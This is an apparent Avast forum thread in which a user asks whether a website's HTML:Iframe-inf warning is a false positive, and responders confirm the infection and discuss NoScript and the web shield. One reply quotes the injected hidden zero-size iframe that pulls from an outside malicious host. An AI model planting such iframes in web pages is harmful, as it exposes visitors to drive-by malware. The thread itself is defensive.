HTML:Iframe-inf on Website Browse

Greetings all,
Apologies if this is an old and tired query. I am receiving notification that a web site I am browsing: hXXp://www.negociosnow.com is infected with HTML:Iframe-inf. None of the other AV software I am running on various machines seem to detect this, yet Avast does. I’ve done a little research on the subject, but nothing is really helping me. Is there a way I might determine whether this is a false positive? What does Avast look for to trigger the warning?
Cheers!

Welcome NeonK

Please read:
Every 3.6 seconds a website is infected
http://forum.avast.com/index.php?topic=47096.0

The site owner has to be made aware that the site is infected and point them to this topic.

the site contains iframe :


<iframe src="hxxp://svhost.org/sutra/out.php?s_id=2" width="0" height="0" frameborder="0"></iframe>

and see this : http://www.google.com/safebrowsing/diagnostic?site=svhost.org

avast generally detects these with no false positive.

Thank you both for your responses and now I am intrigued! I know it may sound incredibly naive, but nmb, how/where did you find that entry? It does not (apparently) appear when browsing the page source…

you cannot view it on page source option. as soon as you try to open the site, the iframe loads up and later it cannot be seen, when the website is fully loaded, in page source.

nmb

if you’re in Firefox, use the noscript extension, it protects against iframes if you check the option.

What does Avast look for to trigger the warning?
;D

noscript is not an “easy to use add-on” for “novices”.

I think the web shield catches it before noscript blocks it.
As far as I know it is scanned before it enters the browser cache.
So, whilst this is a good option to enable, it wont stop avast! from alerting…

So, whilst this is a good option to enable, it wont stop avast! from alerting...

+1

no I never had any alert from the webshield (and no aborted connection in silent mode either) on encountered iframes, but pop ups from noscript yes.

What I meant is, that enabling that feature in NoScript will block ALL iframes from loading, regardless of the content.
If you encounter an infected site/iframe, even with this setting, avast! will still alert because it gets there first.

oh OK that’s a misunderstanding…all iFrames as opposed to malicious iFrames :wink: …and of course web shield will be there first as it acts as a proxy with the browsing.

Thanks lads. Truely helpful!

We here work a lot better than the UN:
http://www.un.org/en/index.shtml

Hi malware fighters,

Interesting video about a cybercrime gang injecting malicious iFrame into websites grand scale:
http://paulfdixon.com/secblog/2009/07/vulnerability-malicious-iframe-hacking-infected-web-pages/

polonus

interesting thanks :slight_smile:

Symantec promoting Avira and AVG ;D

This video is produced by Symantec and demonstrates how a system is compromised by a malicious IFRAME and how the MPack gang has accomplished this on literally thousands of websites through usage of an IFRAME
What can you do?

  1. Make sure your Anti-Virus Software is up-to-date. If you don’t have an anti-virus product Avira provides a free anti-virus. The free version does not include webguard, but several sites report that if you combine it with AVG’s Linkscanner, you’ll have some luck.

Hi YoKenny,

Why didn’t they mention avast. We are top of the pack here,

pol

They lost an important person and we gained a new CEO:
http://blog.avast.com/2009/07/20/welcome-and-why-i-joined-avast